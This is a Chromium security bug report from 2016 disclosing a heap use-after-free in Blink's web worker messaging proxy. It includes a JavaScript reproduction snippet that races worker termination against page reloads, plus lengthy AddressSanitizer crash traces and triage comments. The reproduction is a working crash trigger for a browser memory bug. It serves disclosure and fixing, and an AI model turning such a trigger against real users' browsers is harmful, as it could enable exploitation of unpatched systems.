Issue metadata
Sign in to add a comment
|
Security: Web Workers - Use After Free with DedicatedWorkerMessagingProxy
Reported by
loobeny...@gmail.com,
Oct 1 2016
|
||||||||||||||||||||||
Issue descriptionVULNERABILITY DETAILS Steps to reproduce: 1. Run server side script UAF_DedicatedWorkerMessagingProxy_Repro.js in Node.js (node UAF_DedicatedWorkerMessagingProxy_Repro.js ). 2. Enter http://localhost:12345 in Chrome browser ASAN build. 3. ASAN reports a Use After Free with DedicatedWorkerMessagingProxy. SUMMARY: AddressSanitizer: heap-use-after-free C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\InProcessWorkerMessagingProxy.cpp:157 in blink::InProcessWorkerMessagingProxy::dispatchErrorEvent VERSION Chrome Version: Chromium 55.0.2876.0 (Developer Build) (32-bit) ( https://www.googleapis.com/download/storage/v1/b/chromium-browser-asan/o/win32-release%2Fasan-win32-release-421807.zip?generation=1475225824169000&alt=media ) Operating System: Windows 10 REPRODUCTION CASE (full code in UAF_DedicatedWorkerMessagingProxy_Repro.js) var MainPageCode = '<html><script>setTimeout(function(){location.reload()},100+Math.floor(400*Math.random()));\n'; MainPageCode += 'var uInt8Array = new Uint8Array(124);\n'; MainPageCode += 'for (var i = 0; i < uInt8Array.length; ++i) {\n uInt8Array[i] = i;\n }\n'; MainPageCode += 'var worker1 = new Worker("worker1.js");\n'; MainPageCode += 'setTimeout(function(){worker1.postMessage(uInt8Array.buffer, [uInt8Array.buffer]);\n try{worker1.terminate();} catch(e){}\n'; MainPageCode += '}, 430);\n'; MainPageCode += '</script></html>\n'; var workercode1 = 'onmessage = function (e) {transferedChan = e.ports[0]; transferedChan.postMessage("HelloWorker", [msgChan0.port2]); };\n'; workercode1 += 'var msgChan0 = new MessageChannel();\n'; workercode1 += 'console.error("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");\n'; workercode1 += 'try{ dump("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");} catch(e){}\n'; FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION Type of crash: tab Crash State: ================================================================= ==13140==ERROR: AddressSanitizer: heap-use-after-free on address 0x2b24b8ac at pc 0x1bb4d641 bp 0x007dd47c sp 0x007dd470 READ of size 4 at 0x2b24b8ac thread T0 ==13140==WARNING: Failed to use and restart external symbolizer! ==13140==*** WARNING: Failed to initialize DbgHelp! *** ==13140==*** Most likely this means that the app is already *** ==13140==*** using DbgHelp, possibly with incompatible flags. *** ==13140==*** Due to technical reasons, symbolization might crash *** ==13140==*** or produce wrong results. *** #0 0x1bb4d640 in blink::InProcessWorkerMessagingProxy::dispatchErrorEvent C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\InProcessWorkerMessagingProxy.cpp:157 #1 0x1bb5e34d in base::internal::FunctorTraits<void (blink::InProcessWorkerMessagingProxy::*)(const WTF::String &, std::unique_ptr<blink::SourceLocation,std::default_delete<blink::SourceLocation> >, int) __attribute__((thiscall)),void>::Invoke<blink::InProcessWorkerMessagingProxy *,const WTF::String &,std::unique_ptr<blink::SourceLocation,std::default_delete<blink::SourceLocation> >,const int &> C:\b\c\b\win_asan_release\src\base\bind_internal.h:214 #2 0x1bb5e15f in base::internal::Invoker<base::internal::BindState<void (blink::InProcessWorkerMessagingProxy::*)(const WTF::String &, std::unique_ptr<blink::SourceLocation,std::default_delete<blink::SourceLocation> >, int) __attribute__((thiscall)),WTF::UnretainedWrapper<blink::InProcessWorkerMessagingProxy,WTF::FunctionThreadAffinity::CrossThreadAffinity>,WTF::String,WTF::PassedWrapper<std::unique_ptr<blink::SourceLocation,std::default_delete<blink::SourceLocation> > >,int>,void ()>::Run C:\b\c\b\win_asan_release\src\base\bind_internal.h:332 #3 0x15ab5296 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:54 #4 0x1967c688 in blink::scheduler::TaskQueueManager::ProcessTaskFromWorkQueue C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\base\task_queue_manager.cc:344 #5 0x196785fb in blink::scheduler::TaskQueueManager::DoWork C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\base\task_queue_manager.cc:240 #6 0x196816b0 in base::internal::Invoker<base::internal::BindState<void (blink::scheduler::TaskQueueManager::*)(base::TimeTicks, bool) __attribute__((thiscall)),base::WeakPtr<blink::scheduler::TaskQueueManager>,base::TimeTicks,bool>,void ()>::Run C:\b\c\b\win_asan_release\src\base\bind_internal.h:332 #7 0x15ab5296 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:54 #8 0x15911f87 in base::MessageLoop::RunTask C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:405 #9 0x15913d2a in base::MessageLoop::DoDelayedWork C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:552 #10 0x15abe382 in base::MessagePumpDefault::Run C:\b\c\b\win_asan_release\src\base\message_loop\message_pump_default.cc:39 #11 0x15911441 in base::MessageLoop::RunHandler C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:370 #12 0x1599aeae in base::RunLoop::Run C:\b\c\b\win_asan_release\src\base\run_loop.cc:35 #13 0x1cf444bf in content::RendererMain C:\b\c\b\win_asan_release\src\content\renderer\renderer_main.cc:198 #14 0x15787853 in content::RunNamedProcessTypeMain C:\b\c\b\win_asan_release\src\content\app\content_main_runner.cc:418 #15 0x157890d5 in content::ContentMainRunnerImpl::Run C:\b\c\b\win_asan_release\src\content\app\content_main_runner.cc:786 #16 0x157873a4 in content::ContentMain C:\b\c\b\win_asan_release\src\content\app\content_main.cc:20 #17 0xff311b8 in ChromeMain C:\b\c\b\win_asan_release\src\chrome\app\chrome_main.cc:97 #18 0x11da895 in MainDllLoader::Launch C:\b\c\b\win_asan_release\src\chrome\app\main_dll_loader_win.cc:174 #19 0x11d1b0c in main C:\b\c\b\win_asan_release\src\chrome\app\chrome_exe_main_win.cc:245 #20 0x22ab3f7 in __scrt_common_main_seh f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl:253 #21 0x75aa62c3 in BaseThreadInitThunk+0x23 (C:\WINDOWS\System32\KERNEL32.DLL+0x162c3) #22 0x77dd0608 in RtlSubscribeWnfStateChangeNotification+0x438 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x60608) #23 0x77dd05d3 in RtlSubscribeWnfStateChangeNotification+0x403 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x605d3) 0x2b24b8ac is located 44 bytes inside of 80-byte region [0x2b24b880,0x2b24b8d0) freed by thread T0 here: #0 0x228f738 in free e:\b\build\slave\win_upload_clang\build\src\third_party\llvm\projects\compiler-rt\lib\asan\asan_malloc_win.cc:44 #1 0x1c366786 in blink::CompositorWorkerMessagingProxy::~CompositorWorkerMessagingProxy C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\modules\compositorworker\CompositorWorkerMessagingProxy.cpp:19 #2 0x1bb5144b in blink::ThreadedMessagingProxyBase::workerThreadTerminated C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\ThreadedMessagingProxyBase.cpp:122 #3 0x15ab5296 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:54 #4 0x1967c688 in blink::scheduler::TaskQueueManager::ProcessTaskFromWorkQueue C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\base\task_queue_manager.cc:344 #5 0x196785fb in blink::scheduler::TaskQueueManager::DoWork C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\base\task_queue_manager.cc:240 #6 0x196816b0 in base::internal::Invoker<base::internal::BindState<void (blink::scheduler::TaskQueueManager::*)(base::TimeTicks, bool) __attribute__((thiscall)),base::WeakPtr<blink::scheduler::TaskQueueManager>,base::TimeTicks,bool>,void ()>::Run C:\b\c\b\win_asan_release\src\base\bind_internal.h:332 #7 0x15ab5296 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:54 #8 0x15911f87 in base::MessageLoop::RunTask C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:405 #9 0x159138ec in base::MessageLoop::DoWork C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:511 #10 0x15abe5d4 in base::MessagePumpDefault::Run C:\b\c\b\win_asan_release\src\base\message_loop\message_pump_default.cc:35 #11 0x15911441 in base::MessageLoop::RunHandler C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:370 #12 0x1599aeae in base::RunLoop::Run C:\b\c\b\win_asan_release\src\base\run_loop.cc:35 #13 0x1cf444bf in content::RendererMain C:\b\c\b\win_asan_release\src\content\renderer\renderer_main.cc:198 #14 0x15787853 in content::RunNamedProcessTypeMain C:\b\c\b\win_asan_release\src\content\app\content_main_runner.cc:418 #15 0x157890d5 in content::ContentMainRunnerImpl::Run C:\b\c\b\win_asan_release\src\content\app\content_main_runner.cc:786 #16 0x157873a4 in content::ContentMain C:\b\c\b\win_asan_release\src\content\app\content_main.cc:20 #17 0xff311b8 in ChromeMain C:\b\c\b\win_asan_release\src\chrome\app\chrome_main.cc:97 #18 0x11da895 in MainDllLoader::Launch C:\b\c\b\win_asan_release\src\chrome\app\main_dll_loader_win.cc:174 #19 0x11d1b0c in main C:\b\c\b\win_asan_release\src\chrome\app\chrome_exe_main_win.cc:245 #20 0x22ab3f7 in __scrt_common_main_seh f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl:253 #21 0x75aa62c3 in BaseThreadInitThunk+0x23 (C:\WINDOWS\System32\KERNEL32.DLL+0x162c3) #22 0x77dd0608 in RtlSubscribeWnfStateChangeNotification+0x438 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x60608) #23 0x77dd05d3 in RtlSubscribeWnfStateChangeNotification+0x403 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x605d3) previously allocated by thread T0 here: #0 0x228f81c in malloc e:\b\build\slave\win_upload_clang\build\src\third_party\llvm\projects\compiler-rt\lib\asan\asan_malloc_win.cc:65 #1 0x14ec5cea in WTF::Partitions::fastMalloc C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\wtf\allocator\Partitions.h:109 #2 0x1989627c in blink::DedicatedWorkerMessagingProxyProviderImpl::createWorkerMessagingProxy C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\web\DedicatedWorkerMessagingProxyProviderImpl.cpp:58 #3 0x1bb2a563 in blink::Worker::createInProcessWorkerMessagingProxy C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\Worker.cpp:51 #4 0x1bb2e86e in blink::InProcessWorkerBase::initialize C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\InProcessWorkerBase.cpp:64 #5 0x1bb2a2a2 in blink::Worker::create C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\Worker.cpp:31 #6 0x19ed814a in blink::V8Worker::constructorCallback C:\b\c\b\Win_ASan_Release\src\out\Release\gen\blink\bindings\core\v8\V8Worker.cpp:203 #7 0x11ca78ec in v8::internal::FunctionCallbackArguments::Call C:\b\c\b\win_asan_release\src\v8\src\api-arguments.cc:19 #8 0x11f37c36 in v8::internal::`anonymous namespace'::HandleApiCallHelper<1> C:\b\c\b\win_asan_release\src\v8\src\builtins\builtins-api.cc:106 #9 0x11f359eb in v8::internal::Builtin_Impl_HandleApiCall C:\b\c\b\win_asan_release\src\v8\src\builtins\builtins-api.cc:131 #10 0x11f34c16 in v8::internal::Builtin_HandleApiCall C:\b\c\b\win_asan_release\src\v8\src\builtins\builtins-api.cc:123 SUMMARY: AddressSanitizer: heap-use-after-free C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\InProcessWorkerMessagingProxy.cpp:157 in blink::InProcessWorkerMessagingProxy::dispatchErrorEvent Shadow bytes around the buggy address: 0x356496c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x356496d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x356496e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x356496f0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 fa fa 0x35649700: fa fa 00 00 00 00 00 00 00 00 04 fa fa fa fa fa =>0x35649710: fd fd fd fd fd[fd]fd fd fd fd fa fa fa fa fa fa 0x35649720: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x35649730: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x35649740: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd 0x35649750: fd fd fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x35649760: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==13140==ABORTING =================================================================
,
Oct 3 2016
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://cluster-fuzz.appspot.com/testcase?key=5447105407877120
,
Oct 3 2016
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://cluster-fuzz.appspot.com/testcase?key=4550953435136000
,
Oct 3 2016
This isn't reproducing on our test infrastructure, although I had to turn your test case into an HTML and a JS file since we don't have node.js available there. Is this 100% reliable for you? Are there any other specific repro instructions?
,
Oct 3 2016
Yes, it's very reliable. However, sometimes you may need to wait for longer or just try a few times.
To make it easy for you to run it with your infrastructure, I also converted the repro to a single HTML file UAF_DedicatedWorkerMessagingProxy_Repro.html.
It's also reproducible with Linux ASAN build, open in UAF_DedicatedWorkerMessagingProxy_Repro.html in Linux ASAN build, I got:
Chromium 55.0.2880.0 (Developer Build) (64-bit)
=================================================================
==1==ERROR: AddressSanitizer: unknown-crash on address 0x7e9f44501a18 at pc 0x7f4a9efd1eb3 bp 0x7ffd1bec98d0 sp 0x7ffd1bec98c8
READ of size 8 at 0x7e9f44501a18 thread T0 (chrome)
==1==WARNING: invalid path to external symbolizer!
==1==WARNING: Failed to use and restart external symbolizer!
#0 0x7f4a9efd1eb2 (/home/coder/ChromeBuilds/asan-linux-release-422398/chrome+0x8f74eb2)
#1 0x7f4a9efd1df6 (/home/coder/ChromeBuilds/asan-linux-release-422398/chrome+0x8f74df6)
#2 0x7f4a9efd19af (/home/coder/ChromeBuilds/asan-linux-release-422398/chrome+0x8f749af)
#3 0x7f4a9efbb0fa (/home/coder/ChromeBuilds/asan-linux-release-422398/chrome+0x8f5e0fa)
#4 0x7f4a9efdd045 (/home/coder/ChromeBuilds/asan-linux-release-422398/chrome+0x8f80045)
#5 0x7f4a9efdf9a3 (/home/coder/ChromeBuilds/asan-linux-release-422398/chrome+0x8f829a3)
#6 0x7f4aa851be60 (/home/coder/ChromeBuilds/asan-linux-release-422398/chrome+0x124bee60)
#7 0x7f4aa881b6b0 (/home/coder/ChromeBuilds/asan-linux-release-422398/chrome+0x127be6b0)
#8 0x7f4aa881bf4f (/home/coder/ChromeBuilds/asan-linux-release-422398/chrome+0x127bef4f)
#9 0x7f4aa8819db5 (/home/coder/ChromeBuilds/asan-linux-release-422398/chrome+0x127bcdb5)
#10 0x7f4aa881a873 (/home/coder/ChromeBuilds/asan-linux-release-422398/chrome+0x127bd873)
#11 0x7f4aa063770c (/home/coder/ChromeBuilds/asan-linux-release-422398/chrome+0xa5da70c)
#12 0x7f4aa88601d2 (/home/coder/ChromeBuilds/asan-linux-release-422398/chrome+0x128031d2)
#13 0x7f4aa885b039 (/home/coder/ChromeBuilds/asan-linux-release-422398/chrome+0x127fe039)
#14 0x7f4aa063770c (/home/coder/ChromeBuilds/asan-linux-release-422398/chrome+0xa5da70c)
#15 0x7f4aa044b827 (/home/coder/ChromeBuilds/asan-linux-release-422398/chrome+0xa3ee827)
#16 0x7f4aa044c5af (/home/coder/ChromeBuilds/asan-linux-release-422398/chrome+0xa3ef5af)
#17 0x7f4aa044e2db (/home/coder/ChromeBuilds/asan-linux-release-422398/chrome+0xa3f12db)
#18 0x7f4aa0458031 (/home/coder/ChromeBuilds/asan-linux-release-422398/chrome+0xa3fb031)
#19 0x7f4aa04d76d4 (/home/coder/ChromeBuilds/asan-linux-release-422398/chrome+0xa47a6d4)
#20 0x7f4aad5e76ad (/home/coder/ChromeBuilds/asan-linux-release-422398/chrome+0x1758a6ad)
#21 0x7f4a9f5a5a51 (/home/coder/ChromeBuilds/asan-linux-release-422398/chrome+0x9548a51)
#22 0x7f4a9f5aa2b6 (/home/coder/ChromeBuilds/asan-linux-release-422398/chrome+0x954d2b6)
#23 0x7f4a9f5a481d (/home/coder/ChromeBuilds/asan-linux-release-422398/chrome+0x954781d)
#24 0x7f4a99010462 (/home/coder/ChromeBuilds/asan-linux-release-422398/chrome+0x2fb3462)
#25 0x7f4a8dc3fec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
Address 0x7e9f44501a18 is a wild pointer.
SUMMARY: AddressSanitizer: unknown-crash (/home/coder/ChromeBuilds/asan-linux-release-422398/chrome+0x8f74eb2)
Shadow bytes around the buggy address:
0x0fd4688982f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fd468898300: 00 00 00 00 00 f7 00 00 00 00 00 00 00 00 00 00
0x0fd468898310: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fd468898320: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fd468898330: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0fd468898340: 00 00 00[00]00 00 00 00 00 00 00 00 00 00 00 00
0x0fd468898350: 00 00 00 00 00 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
0x0fd468898360: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
0x0fd468898370: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
0x0fd468898380: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
0x0fd468898390: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==1==ABORTING
(looks like Chrome Linux build now has some issue with the symbolizer)
,
Oct 4 2016
Reproduced in windows ASAN build by opening the HTML file UAF_DedicatedWorkerMessagingProxy_Repro.html: Chromium 55.0.2880.0 (Developer Build) (32-bit) ( https://www.googleapis.com/download/storage/v1/b/chromium-browser-asan/o/win32-release%2Fasan-win32-release-422398.zip?generation=1475506962107000&alt=media ) ================================================================= ==11028==ERROR: AddressSanitizer: heap-use-after-free on address 0x035c4f2c at pc 0x1ad673d1 bp 0x010fd45c sp 0x010fd450 READ of size 4 at 0x035c4f2c thread T0 ==11028==WARNING: Failed to use and restart external symbolizer! ==11028==*** WARNING: Failed to initialize DbgHelp! *** ==11028==*** Most likely this means that the app is already *** ==11028==*** using DbgHelp, possibly with incompatible flags. *** ==11028==*** Due to technical reasons, symbolization might crash *** ==11028==*** or produce wrong results. *** #0 0x1ad673d0 in blink::InProcessWorkerMessagingProxy::dispatchErrorEvent C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\InProcessWorkerMessagingProxy.cpp:190 #1 0x160b9397 in base::internal::FunctorTraits<void (disk_cache::SimpleSynchronousEntry::*)(const disk_cache::SimpleEntryStat &, std::unique_ptr<std::vector<disk_cache::SimpleSynchronousEntry::CRCRecord,std::allocator<disk_cache::SimpleSynchronousEntry::CRCRecord> >,std::default_delete<std::vector<disk_cache::SimpleSynchronousEntry::CRCRecord,std::allocator<disk_cache::SimpleSynchronousEntry::CRCRecord> > > >, net::GrowableIOBuffer *) __attribute__((thiscall)),void>::Invoke<disk_cache::SimpleSynchronousEntry *,const disk_cache::SimpleEntryStat &,std::unique_ptr<std::vector<disk_cache::SimpleSynchronousEntry::CRCRecord,std::allocator<disk_cache::SimpleSynchronousEntry::CRCRecord> >,std::default_delete<std::vector<disk_cache::SimpleSynchronousEntry::CRCRecord,std::allocator<disk_cache::SimpleSynchronousEntry::CRCRecord> > > >,net::GrowableIOBuffer *> C:\b\c\b\win_asan_release\src\base\bind_internal.h:214 #2 0x1ad77fdf in base::internal::Invoker<base::internal::BindState<void (blink::InProcessWorkerMessagingProxy::*)(const WTF::String &, std::unique_ptr<blink::SourceLocation,std::default_delete<blink::SourceLocation> >, int) __attribute__((thiscall)),WTF::UnretainedWrapper<blink::InProcessWorkerMessagingProxy,WTF::FunctionThreadAffinity::CrossThreadAffinity>,WTF::String,WTF::PassedWrapper<std::unique_ptr<blink::SourceLocation,std::default_delete<blink::SourceLocation> > >,int>,void ()>::Run C:\b\c\b\win_asan_release\src\base\bind_internal.h:332 #3 0x14cdb506 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:54 #4 0x188a28be in blink::scheduler::TaskQueueManager::ProcessTaskFromWorkQueue C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\base\task_queue_manager.cc:344 #5 0x1889e7fb in blink::scheduler::TaskQueueManager::DoWork C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\base\task_queue_manager.cc:240 #6 0x188a631a in base::internal::Invoker<base::internal::BindState<void (blink::scheduler::TaskQueueManager::*)(base::TimeTicks, bool) __attribute__((thiscall)),base::WeakPtr<blink::scheduler::TaskQueueManager>,base::TimeTicks,bool>,void ()>::Run C:\b\c\b\win_asan_release\src\base\bind_internal.h:332 #7 0x14cdb506 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:54 #8 0x14b36e57 in base::MessageLoop::RunTask C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:405 #9 0x14b392aa in base::MessageLoop::DoDelayedWork C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:552 #10 0x14ce4602 in base::MessagePumpDefault::Run C:\b\c\b\win_asan_release\src\base\message_loop\message_pump_default.cc:39 #11 0x14b36311 in base::MessageLoop::RunHandler C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:370 #12 0x14bbfe7e in base::RunLoop::Run C:\b\c\b\win_asan_release\src\base\run_loop.cc:35 #13 0x1c1624df in content::RendererMain C:\b\c\b\win_asan_release\src\content\renderer\renderer_main.cc:198 #14 0x149ac103 in content::RunNamedProcessTypeMain C:\b\c\b\win_asan_release\src\content\app\content_main_runner.cc:418 #15 0x149ad985 in content::ContentMainRunnerImpl::Run C:\b\c\b\win_asan_release\src\content\app\content_main_runner.cc:786 #16 0x149abc54 in content::ContentMain C:\b\c\b\win_asan_release\src\content\app\content_main.cc:20 #17 0xf1611b8 in ChromeMain C:\b\c\b\win_asan_release\src\chrome\app\chrome_main.cc:97 #18 0x7a6a5 in MainDllLoader::Launch C:\b\c\b\win_asan_release\src\chrome\app\main_dll_loader_win.cc:174 #19 0x71b0c in main C:\b\c\b\win_asan_release\src\chrome\app\chrome_exe_main_win.cc:245 #20 0x4cebbd in __scrt_common_main_seh f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl:253 #21 0x741138f3 in BaseThreadInitThunk+0x23 (C:\WINDOWS\SYSTEM32\KERNEL32.DLL+0x138f3) #22 0x77125de2 in RtlUnicodeStringToInteger+0x252 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x65de2) #23 0x77125dad in RtlUnicodeStringToInteger+0x21d (C:\WINDOWS\SYSTEM32\ntdll.dll+0x65dad) 0x035c4f2c is located 44 bytes inside of 80-byte region [0x035c4f00,0x035c4f50) freed by thread T0 here: #0 0x4b2ef8 in free e:\b\build\slave\win_upload_clang\build\src\third_party\llvm\projects\compiler-rt\lib\asan\asan_malloc_win.cc:44 #1 0x1ad368d6 in blink::DedicatedWorkerMessagingProxy::~DedicatedWorkerMessagingProxy C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\DedicatedWorkerMessagingProxy.cpp:18 #2 0x1ad6b18b in blink::ThreadedMessagingProxyBase::workerThreadTerminated C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\ThreadedMessagingProxyBase.cpp:129 #3 0x14cdb506 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:54 #4 0x188a28be in blink::scheduler::TaskQueueManager::ProcessTaskFromWorkQueue C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\base\task_queue_manager.cc:344 #5 0x1889e7fb in blink::scheduler::TaskQueueManager::DoWork C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\base\task_queue_manager.cc:240 #6 0x188a631a in base::internal::Invoker<base::internal::BindState<void (blink::scheduler::TaskQueueManager::*)(base::TimeTicks, bool) __attribute__((thiscall)),base::WeakPtr<blink::scheduler::TaskQueueManager>,base::TimeTicks,bool>,void ()>::Run C:\b\c\b\win_asan_release\src\base\bind_internal.h:332 #7 0x14cdb506 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:54 #8 0x14b36e57 in base::MessageLoop::RunTask C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:405 #9 0x14b38e6c in base::MessageLoop::DoWork C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:511 #10 0x14ce4854 in base::MessagePumpDefault::Run C:\b\c\b\win_asan_release\src\base\message_loop\message_pump_default.cc:35 #11 0x14b36311 in base::MessageLoop::RunHandler C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:370 #12 0x14bbfe7e in base::RunLoop::Run C:\b\c\b\win_asan_release\src\base\run_loop.cc:35 #13 0x1c1624df in content::RendererMain C:\b\c\b\win_asan_release\src\content\renderer\renderer_main.cc:198 #14 0x149ac103 in content::RunNamedProcessTypeMain C:\b\c\b\win_asan_release\src\content\app\content_main_runner.cc:418 #15 0x149ad985 in content::ContentMainRunnerImpl::Run C:\b\c\b\win_asan_release\src\content\app\content_main_runner.cc:786 #16 0x149abc54 in content::ContentMain C:\b\c\b\win_asan_release\src\content\app\content_main.cc:20 #17 0xf1611b8 in ChromeMain C:\b\c\b\win_asan_release\src\chrome\app\chrome_main.cc:97 #18 0x7a6a5 in MainDllLoader::Launch C:\b\c\b\win_asan_release\src\chrome\app\main_dll_loader_win.cc:174 #19 0x71b0c in main C:\b\c\b\win_asan_release\src\chrome\app\chrome_exe_main_win.cc:245 #20 0x4cebbd in __scrt_common_main_seh f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl:253 #21 0x741138f3 in BaseThreadInitThunk+0x23 (C:\WINDOWS\SYSTEM32\KERNEL32.DLL+0x138f3) #22 0x77125de2 in RtlUnicodeStringToInteger+0x252 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x65de2) #23 0x77125dad in RtlUnicodeStringToInteger+0x21d (C:\WINDOWS\SYSTEM32\ntdll.dll+0x65dad) previously allocated by thread T0 here: #0 0x4b2fdc in malloc e:\b\build\slave\win_upload_clang\build\src\third_party\llvm\projects\compiler-rt\lib\asan\asan_malloc_win.cc:65 #1 0x140eb60a in WTF::Partitions::fastMalloc C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\wtf\allocator\Partitions.h:99 #2 0x18aba3bc in blink::DedicatedWorkerMessagingProxyProviderImpl::createWorkerMessagingProxy C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\web\DedicatedWorkerMessagingProxyProviderImpl.cpp:62 #3 0x1ad44303 in blink::Worker::createInProcessWorkerMessagingProxy C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\Worker.cpp:49 #4 0x1ad485be in blink::InProcessWorkerBase::initialize C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\InProcessWorkerBase.cpp:66 #5 0x1ad44042 in blink::Worker::create C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\Worker.cpp:30 #6 0x190fda40 in blink::V8Worker::constructorCallback C:\b\c\b\win_asan_release\src\out\release\gen\blink\bindings\core\v8\V8Worker.cpp:203 #7 0x10ef1f9c in v8::internal::FunctionCallbackArguments::Call C:\b\c\b\win_asan_release\src\v8\src\api-arguments.cc:19 #8 0x111849e6 in v8::internal::`anonymous namespace'::HandleApiCallHelper<1> C:\b\c\b\win_asan_release\src\v8\src\builtins\builtins-api.cc:106 #9 0x1118279b in v8::internal::Builtin_Impl_HandleApiCall C:\b\c\b\win_asan_release\src\v8\src\builtins\builtins-api.cc:131 #10 0x111819c6 in v8::internal::Builtin_HandleApiCall C:\b\c\b\win_asan_release\src\v8\src\builtins\builtins-api.cc:123 SUMMARY: AddressSanitizer: heap-use-after-free 